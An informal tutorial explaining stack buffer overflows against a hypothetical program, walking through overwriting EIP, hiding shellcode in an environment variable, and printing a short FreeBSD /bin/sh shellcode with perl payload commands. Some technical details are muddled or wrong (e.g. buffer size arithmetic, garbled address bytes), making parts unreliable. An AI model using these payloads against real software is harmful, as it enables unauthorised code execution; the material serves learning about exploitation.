Buffer Overflows Tutorial

If you are into IT Security/Hacking or whatever you call it , you probably
came into BOF or Buffer Overflow. It’s been considered as one of the most
difficult or challenging fields. (To my opinion it is not)

In this article I will try to explain you the basic
idea behind it , I am not going into detail or specific example since there
are plenty of texts out there doing that , I will just describe how this kind of
exploit work.

NOTE : At the end of this article you will find plenty of texts describing this
technique in detail using examples.

=================================

Every executable file after we trigger it to run is going to use
some memory. (Remember that) Some memory segments used to store
data some other instructions and some other memory pointers.

Imagine the following :

we do : ./tool
next we have that :

Memory for this tool Starts ————–> 0×8048448
BLABLA
0×8048451 call 0×8048440 <f>
BLABLA
BLABLA
Memory for this tool Ends ————–> 0×804845a

<p>As you can see there is a Start and End for every execution , we will
pay attention in between , where “tool” is calling some function.

If we could change the 0×8048440 to an address we have load our code
we could run anything we wanted during the execution of our application.

So , in order to change that address we need to overflow a buffer inside
the “tool” . If we overflow it we can point it to our code somewhere
else in the memory.

First of all we need to find when tool overflows and cannot accept more data.

Lets imagine that there is a buffer in “tool” : char data[10]; used during the
execution procedure.

Easy to imagine what we need to do to overflow that buffer right ?

1) Create an enviroment : export BUFFER=`perl -e ‘{print “A”x”20″}’`

– print “A”x”20″ // This prints out the buffer we want to create
// Choose it in a way that a) if you know the buffer size
// try to make it twice as big or b) if you dont know
// The buffer size , create a very big e.g. print “A”x”2000″

2) Send to “tool” data bigger than 10xchar = 80bytes.

It depends on the software you want to exploit e.g

a) if tools take arguments from the command line like that : ./tool arg[0] arg[1] ..

We can pass our buffer doing that : ./tool $BUFFER

b) if tools take arguments like that : ./tool < argument

We can do that : ./tools < $BUFFER

Know you need to see the following error after executing the software, so you can be sure
there is a buffer overflow on the spot :

[me@cipher]$ ./tool $BUFFER
Segmentation Fault (Core Dump)

Segmentation Fault means that we overflow the memory and we change the pointer.

If we look with GDB the registers we will see that EIP register would have been
0×41414141. (41 == A in hex.) which mean that we change the address to 0×41414141.

If we could overflow “tool” with an address we load our software we can run whatever
we wanted.

OK , its a bit difficult to know the address we load our code , so we load our
BOF exploit using enviroment , we do that cause we know where the env variables
start.

Lets say that the environment variable start at : 0xbffffb54

If we want to pass out code in the buffer of “tool” we need to overflow
“tool” using 0xbffffb54 as argument.

so lets do that :
perl -e ‘{print “T��”x”20″}’ > BUFFER.txt //T�� is the representation of 0xbffffb54

if we do : ./tool < BUFFER.txt , EIP will be 0xbffffb54 so we know it will
execute our code.

lets load a SHELLCODE in the environment and do it all together :

[me@cipher]$export BUFFER=`perl -e ‘{print “\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50
\x56\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff
\x2f\x62\x69\x6e\x2f\x73\x68\x23″}’`
[me@cipher]$perl -e ‘{print “T��”x”20″}’ > BUFFER.txt
[me@cipher]$./tool < BUFFER.txt
$

Please NOTE : SHELLCODE is different for each OS and architecture. The one above
is for FreeBSD.